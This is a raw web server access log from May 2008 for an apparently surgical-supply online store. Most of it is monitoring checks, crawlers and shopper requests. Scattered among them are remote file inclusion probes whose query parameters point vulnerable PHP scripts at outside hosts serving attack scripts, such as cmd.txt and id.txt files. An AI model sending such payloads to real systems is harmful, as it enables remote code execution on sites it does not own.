209.59.12.99 - - [22/May/2008:00:00:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
141.53.8.217 - - [22/May/2008:00:01:25 -0400] "GET /logs/config.inc.php?path_escape=http://www.geocities.com/luna_kinthil/cmd.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
141.53.8.217 - - [22/May/2008:00:01:25 -0400] "GET /config.inc.php?path_escape=http://www.geocities.com/luna_kinthil/cmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/May/2008:00:05:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
141.53.8.217 - - [22/May/2008:00:07:13 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/luna_kinthil/cmd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
141.53.8.217 - - [22/May/2008:00:07:13 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/luna_kinthil/cmd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/May/2008:00:10:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.33 - - [22/May/2008:00:15:12 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.33 - - [22/May/2008:00:15:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58601037281600D040096+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [22/May/2008:00:15:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.33 - - [22/May/2008:00:16:54 -0400] "GET /images/login_bottom-left.gif HTTP/1.1" 200 54 "-" "Googlebot-Image/1.0"
58.26.137.64 - - [22/May/2008:00:17:54 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.69"
58.26.137.64 - - [22/May/2008:00:17:56 -0400] "GET /convert/mvcw.php?vwar_root=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.69"
74.6.24.186 - - [22/May/2008:00:18:11 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.0" 200 38212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [22/May/2008:00:20:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.215.135.71 - - [22/May/2008:00:21:18 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 60593 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
65.55.105.232 - - [22/May/2008:00:21:33 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.232 - - [22/May/2008:00:21:33 -0400] "GET /logs/access_log.Q108041100 HTTP/1.1" 200 3337756 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.59.12.99 - - [22/May/2008:00:25:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.255.21.82 - - [22/May/2008:00:26:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 38212 "http://acesurgical.com/home_May08.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:26:46 -0400] "GET /images/store_blades_section.jpg HTTP/1.1" 206 11788 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:26:46 -0400] "GET /images/store_burs_section.jpg HTTP/1.1" 206 7026 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:26:46 -0400] "GET /images/store_saws_section.jpg HTTP/1.1" 200 10028 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:26:46 -0400] "GET /images/store_sutures_section.jpg HTTP/1.1" 200 28375 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:26:47 -0400] "GET /images/store_syringe_section.jpg HTTP/1.1" 200 9321 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:26:47 -0400] "GET /images/store_xray_section.jpg HTTP/1.1" 200 8861 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:22 -0400] "GET /images/nav04_contact_over.jpg HTTP/1.1" 200 1183 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:22 -0400] "GET /images/nav04_contact_over.jpg HTTP/1.1" 200 1183 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:24 -0400] "GET /images/over-store_bone_section2.jpg HTTP/1.1" 200 7626 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG HTTP/1.1" 200 30487 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:24 -0400] "GET /images/nav_upper_bgrd.jpg HTTP/1.1" 200 2954 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:24 -0400] "GET /images/nav04_about_off.jpg HTTP/1.1" 200 1255 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:24 -0400] "GET /images/ace_logo_top.jpg HTTP/1.1" 200 2702 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:24 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.1" 200 1390 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:24 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.1" 200 1341 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/nav04_download_off.jpg HTTP/1.1" 200 1206 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.1" 200 965 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/ace_logo_bottom.jpg HTTP/1.1" 200 2447 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/nav_store_head.jpg HTTP/1.1" 200 1953 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/nav_store_index_off.jpg HTTP/1.1" 200 922 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/spacer.gif HTTP/1.1" 200 55 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/login.gif HTTP/1.1" 200 166 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:25 -0400] "GET /images/nav_lower_bgrd.jpg HTTP/1.1" 200 2321 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58137F28D50094E0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C581C77689500BDC0058+M37+ENG HTTP/1.1" 200 29014 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:40 -0400] "GET /images/nav04_download_over.jpg HTTP/1.1" 200 1460 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C581C77689500BDC0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58167CF8A500C7B0058+M37+ENG HTTP/1.1" 200 31627 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C581C77689500BDC0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C581E77F88500C120058+M37+ENG HTTP/1.1" 200 30075 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58167CF8A500C7B0058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58147948B500DB20058+M37+ENG HTTP/1.1" 200 28865 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C581E77F88500C120058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:27:58 -0400] "GET /images/nav04_contact_over.jpg HTTP/1.1" 200 1183 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58147948B500DB20058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:28:28 -0400] "GET /images/nav04_about_over.jpg HTTP/1.1" 200 1472 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58147948B500DB20058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:28:29 -0400] "GET /images/ace_logo_top_over.jpg HTTP/1.1" 200 2616 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58147948B500DB20058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.255.21.82 - - [22/May/2008:00:28:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C581C7CF82500D4C0058+M37+ENG HTTP/1.1" 200 31627 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C58147948B500DB20058+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
58.26.137.64 - - [22/May/2008:00:29:30 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.69"
58.26.137.64 - - [22/May/2008:00:29:31 -0400] "GET /convert/mvcw.php?vwar_root=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.69"
209.59.12.99 - - [22/May/2008:00:30:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.84.245 - - [22/May/2008:00:33:46 -0400] "GET /logs/index.php?sourcedir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
87.106.84.245 - - [22/May/2008:00:33:46 -0400] "GET /index.php?sourcedir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
209.59.12.99 - - [22/May/2008:00:35:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.16.242.144 - - [22/May/2008:00:36:17 -0400] "GET /logs/error_log.Q108012200/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
69.16.242.144 - - [22/May/2008:00:36:17 -0400] "GET /convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
69.16.242.144 - - [22/May/2008:00:36:17 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
87.106.84.245 - - [22/May/2008:00:39:55 -0400] "GET /logs/index.php?redir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
87.106.84.245 - - [22/May/2008:00:39:55 -0400] "GET /index.php?redir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
69.16.242.144 - - [22/May/2008:00:40:14 -0400] "GET /logs/error_log.Q107112400/convert/mvcw.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
209.59.12.99 - - [22/May/2008:00:40:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.148.45.19 - - [22/May/2008:00:43:01 -0400] "GET /logs/files/carprss.php?CarpPath=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 220 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
193.148.45.19 - - [22/May/2008:00:43:01 -0400] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 213 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
193.148.45.19 - - [22/May/2008:00:43:01 -0400] "GET /files/carprss.php?CarpPath=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 215 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
193.148.45.19 - - [22/May/2008:00:43:02 -0400] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 208 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
66.249.70.33 - - [22/May/2008:00:44:50 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 38212 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.33 - - [22/May/2008:00:44:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58601036F84600DF40096+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [22/May/2008:00:45:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.80.193.32 - - [22/May/2008:00:47:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.7.2)"
66.249.70.33 - - [22/May/2008:00:49:26 -0400] "GET /images/over-index5_spat_oste.jpg HTTP/1.1" 200 1372 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [22/May/2008:00:50:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.72.238.62 - - [22/May/2008:00:51:05 -0400] "HEAD / HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Netcraft SSL Server Survey - contact info@netcraft.com)"
209.59.12.99 - - [22/May/2008:00:55:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.67.19.46 - - [22/May/2008:00:56:10 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 262 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [22/May/2008:00:56:10 -0400] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 213 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [22/May/2008:00:56:10 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 257 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [22/May/2008:00:56:11 -0400] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 208 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
217.67.26.84 - - [22/May/2008:00:59:36 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:00:59:37 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:00:59:37 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
217.67.26.84 - - [22/May/2008:00:59:37 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
151.1.32.12 - - [22/May/2008:01:00:32 -0400] "GET /logs/home.php?pag=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.806"
151.1.32.12 - - [22/May/2008:01:00:32 -0400] "GET /home.php?pag=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.806"
209.59.12.99 - - [22/May/2008:01:00:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [22/May/2008:01:05:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [22/May/2008:01:10:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.23.228.138 - - [22/May/2008:01:14:37 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 38212 "http://www.acesurgical.com/home_May08.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:38 -0400] "GET /images/ace_logo_top.jpg HTTP/1.1" 200 2702 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:39 -0400] "GET /images/nav04_about_off.jpg HTTP/1.1" 200 1255 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:39 -0400] "GET /images/nav_upper_bgrd.jpg HTTP/1.1" 200 2954 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:39 -0400] "GET /images/nav04_shop_over.jpg HTTP/1.1" 200 1722 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:40 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.1" 200 1341 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:41 -0400] "GET /images/nav04_download_off.jpg HTTP/1.1" 200 1206 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:41 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.1" 200 965 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:42 -0400] "GET /images/ace_logo_bottom.jpg HTTP/1.1" 200 2447 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:43 -0400] "GET /images/nav_store_head.jpg HTTP/1.1" 200 1953 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:43 -0400] "GET /images/nav_lower_bgrd.jpg HTTP/1.1" 200 2321 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:43 -0400] "GET /images/nav_store_index_off.jpg HTTP/1.1" 200 922 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:43 -0400] "GET /images/spacer.gif HTTP/1.1" 200 55 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
